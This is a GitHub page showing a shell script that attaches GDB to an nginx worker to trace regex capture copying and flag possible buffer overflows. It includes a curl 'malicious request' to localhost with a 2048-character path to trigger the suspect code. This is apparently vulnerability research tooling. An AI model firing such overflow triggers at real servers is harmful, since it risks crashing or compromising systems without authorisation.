-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathgdb_trace.sh
More file actions
80 lines (69 loc) · 2.19 KB
/
Copy pathgdb_trace.sh
File metadata and controls
80 lines (69 loc) · 2.19 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/bin/sh
# GDB 调试脚本 - 追踪 ngx_http_script_copy_capture_code 执行
WORKER_PID=$(ps aux | grep "nginx: worker" | grep -v grep | awk '{print $2}')
echo "Worker PID: $WORKER_PID"
# 创建 GDB 命令文件
cat > /tmp/gdb_cmds.txt << 'EOF'
set pagination off
set print elements 256
# 定义打印 ngx_str_t 的宏
define print_str
set $s = $arg0
printf "%.*s", $s.len, $s.data
end
# 设置断点
break ngx_http_script_copy_capture_code
break ngx_http_script_copy_capture_len_code
# 当 copy_capture_code 断点命中时执行的命令
commands 1
silent
printf "=== copy_capture_code ===\n"
set $n = code->n
printf "capture_n=%d (group %d)\n", $n, $n/2
printf "ncaptures=%d\n", r->ncaptures
if r->ncaptures > $n + 1
set $c0 = r->captures[$n]
set $c1 = r->captures[$n + 1]
printf "cap[%d]=%d, cap[%d]=%d\n", $n, $c0, $n+1, $c1
printf "copy_len=%d\n", $c1 - $c0
printf "captures_data=%p\n", r->captures_data
printf "source: %.*s\n", $c1 - $c0, r->captures_data + $c0
printf "dest pos=%p, buf.data=%p, buf.len=%ld\n", e->pos, e->buf.data, (long)e->buf.len
printf "dest remaining=%ld\n", (long)(e->buf.data + e->buf.len - e->pos)
# 检查是否可能溢出
if $c1 - $c0 > e->buf.data + e->buf.len - e->pos
printf "*** POTENTIAL OVERFLOW: copy_len(%d) > remaining(%ld) ***\n", $c1 - $c0, (long)(e->buf.data + e->buf.len - e->pos)
end
end
continue
end
# 当 copy_capture_len_code 断点命中时执行的命令
commands 2
silent
printf "=== copy_capture_len_code ===\n"
set $n = code->n
printf "capture_n=%d (group %d)\n", $n, $n/2
if r->ncaptures > $n + 1
set $c0 = r->captures[$n]
set $c1 = r->captures[$n + 1]
printf "cap[%d]=%d, cap[%d]=%d, len=%d\n", $n, $c0, $n+1, $c1, $c1 - $c0
end
continue
end
continue
EOF
# 启动 GDB
echo "Starting GDB..."
gdb -batch -x /tmp/gdb_cmds.txt -p $WORKER_PID > /tmp/gdb_output.txt 2>&1 &
GDB_PID=$!
sleep 1
# 发送恶意请求
echo "Sending malicious request..."
curl -s "http://localhost/api/$(python3 -c "print('A' * 2048)")" > /dev/null 2>&1
# 等待 GDB 完成
sleep 3
kill $GDB_PID 2>/dev/null
wait $GDB_PID 2>/dev/null
# 显示 GDB 输出
echo "=== GDB Output ==="
cat /tmp/gdb_output.txt